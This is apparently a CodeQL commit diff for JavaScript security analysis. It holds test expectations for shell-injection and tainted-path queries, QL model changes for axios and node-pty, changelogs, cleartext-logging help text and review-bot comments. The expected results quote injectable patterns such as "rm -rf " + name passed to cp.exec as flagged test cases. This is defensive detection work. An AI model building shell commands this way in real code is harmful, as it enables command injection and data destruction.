| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:59:1:62:2 | execFil ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:61:3:61:21 | console.log(stdout) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:64:1:66:2 | execFil ... r); \\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:65:3:65:21 | console.log(stderr) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:1:72:2 | execFil ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | execFil ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | execFil ... xml' ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:79:1:79:46 | execFil ... opts) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:82:1:82:90 | execFil ... String) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:84:1:84:115 | execFil ... ring'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:1:86:75 | execFil ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | execSyn ... + foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | execFil ... th}` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | execFil ... th}` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:1:96:53 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:96:36:96:51 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:1:98:55 | exec("c ... h(out)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:98:35:98:54 | doSomethingWith(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:100:1:100:56 | execFil ... ptions) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:1:102:56 | exec("n ... h(out)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:102:36:102:55 | doSomethingWith(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:104:1:104:31 | execFil ... cat` ]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:106:1:106:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:107:1:107:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:108:1:108:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:109:1:109:44 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:111:1:111:51 | spawn(' ... it'] }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:114:15:114:38 | spawn(' ... ename]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:115:3:117:4 | cat.std ... );\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:116:5:116:19 | res.write(data) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:3:118:39 | cat.std ... .end()) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:118:30:118:38 | res.end() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:12:121:64 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:121:47:121:62 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:15:123:67 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:123:50:123:65 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:124:1:124:20 | console.log(notDead) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:10:133:62 | exec("c ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:133:45:133:60 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:1:140:36 | exec('/ ... s) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | spawn("cat") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | require("shelljs") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | shelljs ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | shelljs ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | shelljs ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | require ... spawn') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:1:152:82 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:152:65:152:80 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:1:153:60 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:153:43:153:58 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:154:1:154:26 | cspawn( ... /bar']) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:1:155:47 | cspawn( ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:155:30:155:45 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | cspawn. ... /bar']) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | cspawn. ... tf8' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | require('exec') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | execmod ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:39:162:54 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:163:1:163:42 | execmod ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:1:164:76 | execmod ... (out)}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:164:59:164:74 | console.log(out) |
| autogenerated/TaintedPath/TaintedPath-es6.js:6:14:11:2 | createS ... )));\\n}) |
| autogenerated/TaintedPath/TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) |
| autogenerated/TaintedPath/TaintedPath-es6.js:10:3:10:47 | res.wri ... path))) |


@@ -8,6 +8,11 @@ endpoints
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | notASinkReason | LoggerMethod | string |
| index.js:15:17:15:32 | req.body.isAdmin | NosqlInjection | sinkLabel | NotASink | string |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | notASinkReason | LoggerMethod | string |
| index.js:15:17:15:32 | req.body.isAdmin | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | hasFlowFromSource | true | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | isConstantExpression | false | boolean |
| index.js:15:17:15:32 | req.body.isAdmin | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
@@ -42,6 +47,12 @@ endpoints
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | notASinkReason | ClientRequest | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | notASinkReason | JQueryArgument | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | NosqlInjection | sinkLabel | NotASink | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | notASinkReason | ClientRequest | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | notASinkReason | JQueryArgument | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | hasFlowFromSource | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | isConstantExpression | false | boolean |
| index.js:83:10:85:3 | {\\n " ... ar,\\n } | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
@@ -71,6 +82,11 @@ endpoints
| index.js:84:12:84:18 | foo.bar | NosqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:84:12:84:18 | foo.bar | NosqlInjection | notASinkReason | ClientRequest | string |
| index.js:84:12:84:18 | foo.bar | NosqlInjection | sinkLabel | NotASink | string |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | hasFlowFromSource | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | isConstantExpression | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | isExcludedFromEndToEndEvaluation | false | boolean |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | notASinkReason | ClientRequest | string |
| index.js:84:12:84:18 | foo.bar | ShellCommandInjectionFromEnvironment | sinkLabel | NotASink | string |
| index.js:84:12:84:18 | foo.bar | SqlInjection | hasFlowFromSource | false | boolean |
| index.js:84:12:84:18 | foo.bar | SqlInjection | isConstantExpression | false | boolean |
| index.js:84:12:84:18 | foo.bar | SqlInjection | isExcludedFromEndToEndEvaluation | false | boolean |


@@ -3,3 +3,4 @@
| 2 | NosqlInjectionSink |
| 3 | SqlInjectionSink |
| 4 | TaintedPathSink |
| 5 | ShellCommandInjectionFromEnvironmentSink |


@@ -21,11 +21,16 @@ file_extensions_to_copy = ['.js', '.ts']
# Maps each security query to the test root path for that security query. Each test root path is the
# path of that test relative to a checkout of github/codeql.
test_root_relative_paths = {
'NosqlAndSqlInjection': 'javascript/ql/test/query-tests/Security/CWE-089',
'NosqlAndSqlInjection':
'javascript/ql/test/query-tests/Security/CWE-089',
'TaintedPath':
'javascript/ql/test/query-tests/Security/CWE-022/TaintedPath',
'Xss': 'javascript/ql/test/query-tests/Security/CWE-079',
'XssThroughDom': 'javascript/ql/test/query-tests/Security/CWE-116'
'Xss':
'javascript/ql/test/query-tests/Security/CWE-079',
'XssThroughDom':
'javascript/ql/test/query-tests/Security/CWE-116',
'ShellCommandInjectionFromEnvironment':
'javascript/ql/test/query-tests/Security/CWE-078',
}
logging.basicConfig(level=logging.INFO)
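Review bot: The new `'ShellCommandInjectionFromEnvironment'` entry maps to the whole `Security/CWE-078` test directory, and the autogenerated expectations earlier in this commit show that this pulls in `UselessUseOfCat/uselesscat.js` next to the `UnsafeShellCommandConstruction` fixtures. If only the unsafe-shell-command-construction tests are meant to seed this query's sink candidates, the entry should name that subdirectory, `'ShellCommandInjectionFromEnvironment': 'javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction',`; if copying the extra tests is intentional (for example as negative examples), a short comment on the entry saying so would save the next reader the same question. The other entries map a key to a single query's test root, so the comment above the dict reads as if one key means one query.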


@@ -1,3 +1,13 @@
## 0.4.2
### Minor Analysis Improvements
* Added sinks from the [`node-pty`](https://www.npmjs.com/package/node-pty) library to the `js/code-injection` query.
## 0.4.1
No user-facing changes.
## 0.4.0
### New Features


@@ -0,0 +1,3 @@
## 0.4.1
No user-facing changes.


@@ -0,0 +1,5 @@
## 0.4.2
### Minor Analysis Improvements
* Added sinks from the [`node-pty`](https://www.npmjs.com/package/node-pty) library to the `js/code-injection` query.


@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.4.0
lastReleaseVersion: 0.4.2


@@ -1,5 +1,5 @@
name: codeql/javascript-all
version: 0.4.1-dev
version: 0.4.3-dev
groups: javascript
dbscheme: semmlecode.javascript.dbscheme
extractor: javascript


@@ -87,7 +87,13 @@ File tryExtensions(Folder dir, string basename, int priority) {
* Or `name`, if `name` has no file extension.
*/
bindingset[name]
private string getStem(string name) { result = name.regexpCapture("(.+?)(?:\\.([^.]+))?", 1) }
private string getStem(string name) {
// everything before the last dot
result = name.regexpCapture("(.+?)(?:\\.([^.]+))?", 1)
or
// everything before the first dot
result = name.regexpCapture("^([^.]*)\\..*$", 1)
}
/**
* Gets a file that a main module from `pkg` exported as `mainPath` with the given `priority`.
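Review bot: The QLDoc above `getStem` (it begins outside the hunk; only its last line, `Or `name`, if `name` has no file extension.`, is visible) still describes a single result, but the predicate now yields two candidates for names containing several dots: the second disjunct means `otherlibimpl.node.cjs.js` produces both `otherlibimpl.node.cjs` and `otherlibimpl`, while a dot-less name is unaffected because `^([^.]*)\..*$` cannot match it. Suggest extending the QLDoc with a line such as ` * Also gets the part of `name` before its first dot, so `foo.node.cjs.js` yields both `foo.node.cjs` and `foo`.` The second capture group `([^.]+)` of the first regexp is never read; making it non-capturing would keep the two inline comments honest about which group matters.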


@@ -197,6 +197,20 @@ module ClientRequest {
/** Gets the string `url` or `uri`. */
private string urlPropertyName() { result = "url" or result = "uri" }
/** An API entry-point for the global variable `axios`. */
private class AxiosGlobalEntryPoint extends API::EntryPoint {
AxiosGlobalEntryPoint() { this = "axiosGlobal" }
override DataFlow::SourceNode getASource() { result = DataFlow::globalVarRef("axios") }
}
/** Gets a reference to the `axios` library. */
private API::Node axios() {
result = API::moduleImport("axios")
or
result = API::root().getASuccessor(API::Label::entryPoint(any(AxiosGlobalEntryPoint entry)))
}
/**
* A model of a URL request made using the `axios` library.
*/
@@ -204,9 +218,10 @@ module ClientRequest {
string method;
AxiosUrlRequest() {
this = API::moduleImport("axios").getACall() and method = "request"
this = axios().getACall() and
method = "request"
or
this = API::moduleImport("axios").getMember(method).getACall() and
this = axios().getMember(method).getACall() and
method = [httpMethodName(), "request"]
}
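Review bot: `axios()` now resolves any global variable named `axios`, but neither its QLDoc nor the one on `AxiosGlobalEntryPoint` says so, so a reader of `AxiosUrlRequest` in the second hunk cannot tell why a call on an un-imported `axios` is modelled as a request. Suggest `/** Gets a reference to the `axios` library, either imported as a module or accessed through the global variable `axios` instead of an import. */` on `axios()`. Treating every global of that name as the library is an assumption worth stating on the entry point as well, since an unrelated global called `axios` would be modelled as a request client.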


@@ -23,10 +23,10 @@ import Shared::ModelInput as ModelInput
import Shared::ModelOutput as ModelOutput
/**
* A remote flow source originating from a CSV source row.
* A remote flow source originating from a MaD source row.
*/
private class RemoteFlowSourceFromCsv extends RemoteFlowSource {
RemoteFlowSourceFromCsv() { this = ModelOutput::getASourceNode("remote").asSource() }
private class RemoteFlowSourceFromMaD extends RemoteFlowSource {
RemoteFlowSourceFromMaD() { this = ModelOutput::getASourceNode("remote").asSource() }
override string getSourceType() { result = "Remote flow" }
}


@@ -294,6 +294,27 @@ module CodeInjection {
}
}
/**
* An execution of a terminal command via the `node-pty` library, seen as a code injection sink.
* Example:
* ```JS
* var pty = require('node-pty');
* var ptyProcess = pty.spawn("bash", [], {...});
* ptyProcess.write('ls\r');
* ```
*/
class NodePty extends Sink {
NodePty() {
this =
API::moduleImport("node-pty")
.getMember("spawn")
.getReturn()
.getMember("write")
.getACall()
.getArgument(0)
}
}
/** A sink for code injection via template injection. */
abstract private class TemplateSink extends Sink {
deprecated override string getMessageSuffix() {
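Review bot: `NodePty` marks only the first argument of `write` on the object returned by `spawn` as a sink; the `spawn` call's own command and argument list (`pty.spawn("bash", [], …)` in the example) are not modelled here, so a tainted command name or args array handed to node-pty would go unreported unless a command-execution model covers it — worth confirming, or noting the limitation in the QLDoc. The example inside the JS code block writes `{...}` for the options, which reads as literal code; `{ /* options */ }` would be clearer. The class is also public while the neighbouring `TemplateSink` is `private`; if nothing outside the module needs `NodePty`, declaring it `private` would match the surrounding style.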


@@ -92,9 +92,7 @@ module UnsafeShellCommandConstruction {
StringConcatEndingInCommandExecutionSink() {
this = root.getALeaf() and
root = isExecutedAsShellCommand(DataFlow::TypeBackTracker::end(), sys) and
exists(string prev | prev = this.getPreviousLeaf().getStringValue() |
prev.regexpMatch(".* ('|\")?[0-9a-zA-Z/:_-]*")
)
exists(this.getPreviousLeaf().getStringValue()) // looks like a shell command construction that could be done safer, it has a known prefix
}
override string getSinkType() { result = "string concatenation" }
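Review bot: The trailing comment on the new `exists(this.getPreviousLeaf().getStringValue())` line still describes the intent of the regexp it replaces rather than what the line now checks, and it pushes the line well past the usual width. Suggest moving it above the condition and stating the new rule, e.g. `// any constant string before the tainted leaf counts as a known command prefix (widened from the previous regexp so that e.g. "for foo in (" + name is also reported)`. Since any constant prefix now qualifies, concatenations whose constant part is not a command prefix at all may be reported too; the updated test expectations suggest this is intended, but a sentence in the class QLDoc would help readers judge the precision trade-off. The enclosing class starts outside the hunk.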


@@ -1,3 +1,11 @@
## 0.5.2
No user-facing changes.
## 0.5.1
No user-facing changes.
## 0.5.0
### Minor Analysis Improvements


@@ -2,4 +2,33 @@
"-//Semmle//qhelp//EN"
"qhelp.dtd">
<qhelp>
<include src="CleartextStorage.qhelp" /></qhelp>
<overview>
<p>If sensitive data is written to a log entry it could be exposed to an attacker
who gains access to the logs.</p>
<p>Potential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may
expose system information such as full path names, system information, and sometimes usernames and passwords.</p>
</overview>
<recommendation>
<p>
Sensitive data should not be logged.
</p>
</recommendation>
<example>
<p>In the example the entire process environment is logged using `console.info`. Regular users of the production deployed application
should not have access to this much information about the environment configuration.
</p>
<sample src="examples/CleartextLogging.js" />
<p> In the second example the data that is logged is not sensitive.</p>
<sample src="examples/CleartextLoggingGood.js" />
</example>
<references>
<li>OWASP: <a href="https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/">Insertion of Sensitive Information into Log File</a>.</li>
</references>
</qhelp>


@@ -0,0 +1,2 @@
// BAD: Logging cleartext sensitive data
console.info(`[INFO] Environment: ${process.env}`);
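Review bot: The template literal `${process.env}` stringifies the object to `[object Object]`, so the "BAD" example never actually writes the environment to the log at runtime, which makes the qhelp narrative ("the entire process environment is logged") inaccurate as written. Passing the object as a separate argument, `console.info('[INFO] Environment:', process.env);`, logs its contents and keeps the example a genuine cleartext-logging case, provided the query still flags that form. The `CleartextLoggingGood.js` example has the same `${not_sensitive_data}` issue and would read better as `console.info('[INFO] Some object contains:', not_sensitive_data);`.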


@@ -0,0 +1,3 @@
let not_sensitive_data = { a: 1, b : 2}
// GOOD: it is fine to log data that is not sensitive
console.info(`[INFO] Some object contains: ${not_sensitive_data}`);


@@ -3,7 +3,7 @@ var app = express();
// set up rate limiter: maximum of five requests per minute
var RateLimit = require('express-rate-limit');
var limiter = new RateLimit({
var limiter = RateLimit({
windowMs: 1*60*1000, // 1 minute
max: 5
});


@@ -0,0 +1,3 @@
## 0.5.1
No user-facing changes.


@@ -0,0 +1,3 @@
## 0.5.2
No user-facing changes.


@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.5.0
lastReleaseVersion: 0.5.2


@@ -1,5 +1,5 @@
name: codeql/javascript-queries
version: 0.5.1-dev
version: 0.5.3-dev
groups:
- javascript
- queries


@@ -5,6 +5,8 @@ test_ClientRequest
| apollo.js:17:1:17:34 | new Pre ... yurl"}) |
| apollo.js:20:1:20:77 | createN ... phql'}) |
| apollo.js:23:1:23:31 | new Web ... wsUri}) |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) |
| puppeteer.ts:6:11:6:42 | page.go ... e.com') |
| puppeteer.ts:8:5:8:61 | page.ad ... css" }) |
| puppeteer.ts:18:30:18:50 | page.go ... estUrl) |
@@ -90,6 +92,8 @@ test_ClientRequest
| tst.js:296:5:299:6 | axios({ ... \\n }) |
| tst.js:312:12:312:36 | fetchPo ... o/bar') |
test_getADataNode
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:15:18:15:55 | { 'Cont ... json' } |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:16:15:16:35 | {x: 'te ... 'test'} |
| tst.js:53:5:53:23 | axios({data: data}) | tst.js:53:18:53:21 | data |
| tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:19:57:23 | data1 |
| tst.js:57:5:57:39 | axios.p ... data2}) | tst.js:57:33:57:37 | data2 |
@@ -143,6 +147,10 @@ test_getUrl
| apollo.js:17:1:17:34 | new Pre ... yurl"}) | apollo.js:17:26:17:32 | "myurl" |
| apollo.js:20:1:20:77 | createN ... phql'}) | apollo.js:20:30:20:75 | 'https: ... raphql' |
| apollo.js:23:1:23:31 | new Web ... wsUri}) | apollo.js:23:25:23:29 | wsUri |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:4:11:7:5 | {\\n ... ,\\n } |
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:6:14:6:16 | url |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:12:11:17:5 | {\\n ... }\\n } |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:14:14:14:16 | url |
| puppeteer.ts:6:11:6:42 | page.go ... e.com') | puppeteer.ts:6:21:6:41 | 'https: ... le.com' |
| puppeteer.ts:8:5:8:61 | page.ad ... css" }) | puppeteer.ts:8:29:8:58 | "http:/ ... le.css" |
| puppeteer.ts:18:30:18:50 | page.go ... estUrl) | puppeteer.ts:18:40:18:49 | requestUrl |
@@ -233,6 +241,8 @@ test_getUrl
| tst.js:296:5:299:6 | axios({ ... \\n }) | tst.js:298:14:298:44 | "http:/ ... -axios" |
| tst.js:312:12:312:36 | fetchPo ... o/bar') | tst.js:312:26:312:35 | '/foo/bar' |
test_getAResponseDataNode
| axiosTest.js:4:5:7:6 | axios({ ... \\n }) | axiosTest.js:4:5:7:6 | axios({ ... \\n }) | json | true |
| axiosTest.js:12:5:17:6 | axios({ ... \\n }) | axiosTest.js:12:5:17:6 | axios({ ... \\n }) | json | true |
| tst.js:19:5:19:23 | requestPromise(url) | tst.js:19:5:19:23 | requestPromise(url) | text | true |
| tst.js:21:5:21:23 | superagent.get(url) | tst.js:21:5:21:23 | superagent.get(url) | stream | true |
| tst.js:25:5:25:14 | axios(url) | tst.js:25:5:25:14 | axios(url) | | true |


@@ -0,0 +1,21 @@
//Use of axios as a global variable instead of an imported module to make Ajax calls
var testvar = function () {
axios({
method: 'get',
url: url,
}).then(function (response) {
console.log(response.data) })
axios({
method: 'post',
url: url,
headers: { 'Content-Type': 'application/json' },
data: {x: 'test', y:'test'}
}).then(function (response) {
console.log(response.data) })
}


@@ -57,6 +57,8 @@ nodes
| lib/lib.js:64:41:64:44 | name |
| lib/lib.js:65:22:65:25 | name |
| lib/lib.js:65:22:65:25 | name |
| lib/lib.js:69:27:69:30 | name |
| lib/lib.js:69:27:69:30 | name |
| lib/lib.js:71:28:71:31 | name |
| lib/lib.js:71:28:71:31 | name |
| lib/lib.js:73:21:73:24 | name |
@@ -116,6 +118,7 @@ nodes
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" |
| lib/lib.js:181:21:181:24 | name |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:186:34:186:37 | name |
@@ -385,6 +388,10 @@ edges
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
| lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name |
@@ -463,6 +470,7 @@ edges
| lib/lib.js:181:6:181:52 | broken | lib/lib.js:182:22:182:27 | broken |
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:181:6:181:52 | broken |
| lib/lib.js:181:21:181:24 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:24 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| lib/lib.js:181:21:181:46 | name.re ... "'\\''") | lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" |
| lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name |
| lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name |
@@ -724,6 +732,7 @@ edges
| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command |
| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command |
| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command |
